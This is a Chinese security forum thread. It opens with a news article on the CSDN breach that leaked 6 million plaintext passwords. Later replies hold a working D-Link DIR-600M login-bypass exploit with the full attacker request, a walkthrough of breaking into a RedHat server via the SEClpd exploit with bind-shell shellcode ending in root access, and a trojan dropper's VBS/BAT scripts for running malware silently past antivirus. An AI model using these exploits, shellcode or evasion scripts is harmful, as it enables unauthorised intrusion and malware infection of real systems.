最近看过此主题的会员

返回列表 发帖

600万用户遭泄密案告破 CSDN首吃信息安全罚单

[ 不止CSDN一家有这样的问题。由于对安全的不重视,不少急速发展的互联网企业在不经意间为自己埋下了安全隐患的种子 ]

  昨日,曾引发业界关注的CSDN网站用户数据泄密案宣告破获。北京警方对CSDN网站未落实国家信息安全等级保护制度造成用户信息泄露事件做出行政警告处罚,这是国内自落实信息安全等级保护制度以来开出的第一张“罚单”。

  CSDN创立于1999年,是中国最大的中文IT知识服务集团。目前,网站拥有2000万注册用户、50万注册企业及合作伙伴,日访问量约2000万次。

  600万用户遭泄密

  去年12月21日,曾有网友爆料称,国内程序员社区CSDN的安全系统遭到黑客攻击,CSDN数据库中的600万用户的登录名及密码遭到泄露。随后,天涯社区、世纪佳缘、开心网等十余家国内知名网站近5000万用户的信息在网上被黑客公布。

  一时间,消息真假难辨,互联网上人人自危。

  国家互联网应急中心(CNCERT)数据统计称,被公开的疑似泄露数据库26个,涉及账号、密码信息2.78亿条。

  CSDN在微博上确认了这一事故,并表示已经报案。对于大范围的用户数据泄露一事,CSDN回应称,经过初步分析,该库系2009年CSDN作为备份所用。

  警方的调查显示,嫌疑人承认是在2010年4月利用CSDN网站漏洞,非法侵入服务器获取用户数据,还交代了曾经入侵过某充值平台及某股票系统等犯罪事实。

  这种行为的行业术语称作“拖库”,指黑客把网站服务器上数据库偷偷下载到自己电脑中;而撞库则是,黑客用拖库所得的海量注册邮箱和密码,在电子支付、微博、聊天、购物等不同平台上试探登录,如果有人习惯使用相同的注册邮箱和密码,很容易会被黑客撞库盗号。

  与此同时,北京警方对CSDN网站开展了调查,发现其未落实国家信息安全等级保护制度,安全管理制度和技术保护措施落实不到位是造成用户信息泄露的主要原因。

  北京市公安局向CSDN网运营公司提出了具体整改要求,并依据《中华人民共和国计算机信息系统安全保护条例》(中华人民共和国国务院令147号)第二十条第(一)项规定,对北京创新乐知信息技术有限公司做出行政警告处罚。

  杭州安恒信息技术公司给CSDN提供的审计报告显示,由于CSDN网站开源系统等第三方系统存在第三方系统漏洞、已停用的老系统、应用程序漏洞、系统后台认证等四大问题,使其网站存在安全风险,泄露了大量信息。

  CSDN反思

  CSDN创始人蒋涛曾坦言,“CSDN对敏感信息不敏感,也缺乏安全意识。”在CSDN拥有不到100台服务器,注册信息只包括邮箱和密码的情况下,他一度认为,这些注册信息并不具备太强的隐私性,也不会引起黑客的兴趣。

  “整个事件最不可思议的地方在于,像CSDN这样的以程序员和开发为核心的大型网站,居然采用明文存储密码。”专业IT博客“月光博客”撰文表示,“稍微懂一点编程的程序员都知道,为了用户的安全,应该在数据库里保存用户密码的加密信息,最简单的MD5(密码+随机字符串),一般类似UCenter这样的论坛还会将这个信息再MD5一次,这样黑客即使下载了数据库,破解用户密码也不是一件容易的事情。”

  不止CSDN一家有这样的问题。由于对安全的不重视,不少急速发展的互联网企业在不经意间为自己埋下了安全隐患的种子。据蒋涛介绍,目前,整个互联网的安全现状极不乐观:70%以上的加密算法密码库都可以通过高频碰撞破解,80%以上的互联网公司都存在漏洞,60%以上有安全策略的公司还存在着漏洞,地下数据库显示,网站暴露出来的问题甚至更多。

  自今年1月,北京警方对全市106家互联网网站开展信息安全检查工作,发现并现场纠正206处安全隐患。而360网站安全检测平台对随机抽取的93233个国内网站分析发现,存在高危漏洞的网站比例达36%,存在中危漏洞的网站则有16%,两者合计比例高达52%,国内网站安全防护能力仍有待完善。

  今年1月,CSDN和阿里云结成战略合作关系,共同打造安全可信的开发者服务平台。当时蒋涛反思称,“如何让开发者信任CSDN,如何提高开发者的安全技能,如何为开发者创造价值,这是CSDN安全事件之后反思的主题。”

  互联网安全问题依然刻不容缓。天涯方面昨日对记者表示,目前关于用户数据泄露一事暂无进展可透露。

 

您可能还想看的主题:

浙江政安信息安全研究中心招贤纳士啦!

关于信息安全等级保护

[HR]北京安码科技 信息安全工程师

[HR]上海四域 信息安全工程师

《信息安全架构》

继续信息安全。

2010中国信息安全与隐私保护座谈会在京召开

信息安全嘛。呵呵。。发个文章。

北京大学信息安全(PDF)

先要弄懂什么是《信息安全》

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小一发表,本帖发表者小一符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小一和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

文明密码行政警告
兄弟们我来了

TOP

D-Link DIR-600M Wireless N 150管理员密码绕过漏洞
# Exploit Title: D-Link DIR-600M Wireless N 150 Login Page Bypass
# Date: 19-05-2017
# Software Link: http://www.dlink.co.in/products/?pid=DIR-600M
# Exploit Author: Touhid M.Shaikh
# Vendor : www.dlink.com
# Contact : http://twitter.com/touhidshaikh22
# Version: Hardware version: C1
Firmware version: 3.04
# Tested on:All Platforms


1) Description

After Successfully Connected to D-Link DIR-600M Wireless N 150
Router(FirmWare Version : 3.04), Any User Can Easily Bypass The Router's
Admin Panel Just by Feeding Blank Spaces in the password Field.

Its More Dangerous when your Router has a public IP with remote login
enabled.

For More Details : www.touhidshaikh.com/blog/

IN MY CASE,
Router IP : http://192.168.100.1



Video POC : https://www.youtube.com/watch?v=waIJKWCpyNQring

2) Proof of Concept

Step 1: Go to
Router Login Page : http://192.168.100.1/login.htm

Step 2:
Fill username: admin
And in Password Fill more than 20 tims Spaces(" ")



Our Request Is look like below.
-----------------ATTACKER REQUEST-----------------------------------

POST /login.cgi HTTP/1.1
Host: 192.168.100.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.100.1/login.htm
Cookie: SessionID=
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

username=Admin&password=+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++&submit.htm%3Flogin.htm=Send



--------------------END here------------------------

Bingooo You got admin Access on router.
Now you can download/upload settiing, Change setting etc.




















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

一次曲折的RedHat Linux操作系统入侵
出处:H.L.C此文的目的不在于教人入侵,而是为了提高自身的技术和加强网络管理员的安全防范意识。仅此而已!粗心大意的网络管理员应该明白:由于你们一个小小的操作失误可能会导致整个网络全面沦陷!本文主要是围绕LPD:网络打印服务的攻击而进行的。  首先确定目标,假设是:www.XXX.com  先让俺看看是不是连得上:C:ping www.XXX.com   Pinging www.XXX.com[202.106.184.200] with 32 bytes of data:   Reply from 202.106.184.200: bytes=32 time=541ms TTL=244   Reply from 202.106.184.200: bytes=32 time=620ms TTL=244   Reply from 202.106.184.200: bytes=32 time=651ms TTL=244   Reply from 202.106.184.200: bytes=32 time=511ms TTL=244   Ping statistics for 202.106.184.200:   Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),   Approximate round trip times in milli-seconds:   Minimum = 511ms, Maximum = 651ms, Average = 580ms   嘻嘻—不但连得上,速度还不错……  先telnet看看banner:  C:>telnet www.XXX.com  遗失对主机的连接。  再试试ftp,  C:>ftp www.XXX.com  Connected to www.fbi.gov.tw.  220 XXX-www FTP server (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready.  User (www.XXX.com:(none)):  wu-2.6.1看来有点眉目了。这台机器像是RedHat7.0!首先必须确认一下,连上俺的跳板:C:>telnet xxx.xxx.xxx.xxx   Red Hat Linux release 7.0 (Guinness)   Kernel 2.2.16-22smp on an i686   login: fetdog   Password:   bash-2.04$   拿nmap扫描器,看看其中的奥妙~~~bash-2.04$nmap -sT -O www.XXX.com   Starting nmap V. 2.54BETA7 ( www.insecure.org/nmap/ )   WARNING! The following files exist and are readable: /usr/local/sha   -services and ./nmap-services. I am choosing /usr/local/share/nmap/   s for security reasons. set NMAPDIR=. to give priority to files in   irectory   Interesting ports on (www.XXX.com):   (The 1520 ports scanned but not shown below are in state: closed)   Port State Service   25/tcp open smtp   79/tcp open finger   80/tcp open http   111/tcp open sunrpc   113/tcp open auth   443/tcp open https   513/tcp open login   514/tcp open shell   515/tcp open printer   587/tcp open submission   1024/tcp open kdm   TCP Sequence Prediction: Class=random positive increments   Difficulty=3247917 (Good luck!)   Remote operating system guess: Linux 2.1.122 - 2.2.16   Nmap run completed -- 1 IP address (1 host up) scanned in 9 seconds   打开的端口还挺多,这意味着入侵的可能性增加。79/tcp open finger ,先看看这个,不过linux没有finger用户列表这个漏洞。  bash-2.04$finger @www.XXX.com  [www.XXX.com]  No one logged on.  再看看111/tcp open sunrpc 。近来rpc漏洞风行,不知道RH7这个东东会不会有?先看看再说!bash-2.04$rpcinfo -p www.XXX.com   program vers proto port service   100000 2 tcp 111 rpcbind   100000 2 udp 111 rpcbind   100021 1 udp 1024 nlockmgr   100021 3 udp 1024 nlockmgr   100024 1 udp 1025 status   100024 1 tcp 1024 status   看来有rpc.statd服务。来看看能不能远程溢出拿个rootshell。bash-2.04$./statdx -h   statdx by ron1n   Usage: stat [-t] [-p port] [-a addr] [-l len]   [-o offset] [-w num] [-s secs] [-d type]   -t attack a tcp dispatcher [udp]   -p rpc.statd serves requests on [query]   -a the stack address of the buffer is   -l the length of the buffer is [1024]   -o the offset to return to is [600]   -w the number of dwords to wipe is [9]   -s set timeout in seconds to [5]   -d use a hardcoded   Available types:   0 Redhat 6.2 (nfs-utils-0.1.6-2)   1 Redhat 6.1 (knfsd-1.4.7-7)   2 Redhat 6.0 (knfsd-1.2.2-4)   看来并不支持RH7。还是继续尝试,把0-2全部试试看再说!start……bash-2.04$stat -d 0 www.XXX.com  buffer: 0xbffff314 length: 999 (+str/+nul)   target: 0xbffff718 new: 0xbffff56c (offset: 600)   wiping 9 dwords   Failed - statd returned res_stat: (failure) state: 21   受挫,再试……bash-2.04$stat -d 1 www.XXX.com   buffer: 0xbffff314 length: 999 (+str/+nul)   target: 0xbffff718 new: 0xbffff56c (offset: 600)   wiping 9 dwords   Failed - statd returned res_stat: (failure) state: 21   一样!继续……bash-2.04$stat -d 1 www.XXX.com   buffer: 0xbffff314 length: 999 (+str/+nul)   target: 0xbffff718 new: 0xbffff56c (offset: 600)   wiping 9 dwords   Failed - statd returned res_stat: (failure) state: 21   rpc.statd行不通,想想RH7应该有个远程溢出,好像是lp服务造成的。“seclpd.c”应该是这个东东了。  —————以下代码仅供教学使用,决不能用来进行恶意攻击—————/*   * Welcome to http://hlc.cnroot.com/   * Run: ./SEClpd victim brute -t type   * Try first ./SEClpd victim -t 0 then try the brute.   */   #include   #include   #include   #include   #include   #include   #include   #include   #include   #include   #include   #include   #define ADDRESS_BUFFER_SIZE 32+4   #define APPEND_BUFFER_SIZE 52   #define FORMAT_LENGTH 512-8   #define NOPCOUNT 200   #define SHELLCODE_COUNT 1030   #define DELAY 50000 /* usecs */   #define OFFSET_LIMIT 5000   char shellcode[] =   "x31xdbx31xc9x31xc0xb0x46xcdx80"   "x89xe5x31xd2xb2x66x89xd0x31xc9x89xcbx43x89x5dxf8"   "x43x89x5dxf4x4bx89x4dxfcx8dx4dxf4xcdx80x31xc9x89"   "x45xf4x43x66x89x5dxecx66xc7x45xeex0fx27x89x4dxf0"   "x8dx45xecx89x45xf8xc6x45xfcx10x89xd0x8dx4dxf4xcd"   "x80x89xd0x43x43xcdx80x89xd0x43xcdx80x89xc3x31xc9"   "xb2x3fx89xd0xcdx80x89xd0x41xcdx80xebx18x5ex89x75"   "x08x31xc0x88x46x07x89x45x0cxb0x0bx89xf3x8dx4dx08"   "x8dx55x0cxcdx80xe8xe3xffxffxff/bin/sh";   brute暴力破解。等上5-8分钟左右,结果出来了。- [+] shell located on www.XXX.com   - [+] Enter Commands at will   Linux XXX.WWW 2.2.16-22smp #1 SMP Tue Aug 22 16:39:21 EDT 2000 i686 unknown   uid=0(root) gid=7(lp)   uid=0(root权限),现在可以近一步入侵!但不要做坏事!
seclpd.c.rar


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

过2010主动和行为的方法
第三代杀软的主动和行为厉害的没法说,其实不少大牛其实都找到了方法。只是没放出来,小凉谭通过小熊的指引说是一个bat就能搞定。机缘巧合,在登录97ai.com的时候发现他上面有个网址发部器,一看当然知道是木马啦 ,就下了下来是个exe的自解压,拿到虚拟机上解压了一下,发现释放了四个文件,一个是快播的播放器,一个是木马,一个是名为setup.bat的文件,一个是名为setup.vbs的文件,看了一下啊。发现他首先把四个文件都解压到windows目录下,首先运行setup.vbs,通过这个文件调用setup.bat,再通过bat运行播放器和木马。反正留着也没用就发出来共享一下 。以下是两个主要文件的内容:setup.bat内容如下@echo offserver.exe-----------------------------------------------这个是木马名QvodSetupPlus3.exe------------------------这个是快播安装文件setup.vbs内容如下On Error Resume NextDim oShellSet oShell= WScript.CreateObject("WScript.Shell")a = oShell.Run ("c:windowssetup.BAT",0)(这个vbs就是运行bat用的。但我也不明白什么意思?在新手讨论区发了个帖子。很快得到了回答,在这里要感谢一下咱们暗组中的shedream)说明如下:On Error Resume Next        '如果有错误则进行下一句Dim oShell        '声明变量Set oShell= WScript.CreateObject("WScript.Shell")        '创建一个WScript.shell对象a = oShell.Run ("",0)        '打开一个可执行文件,""号内为程序路径


















公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表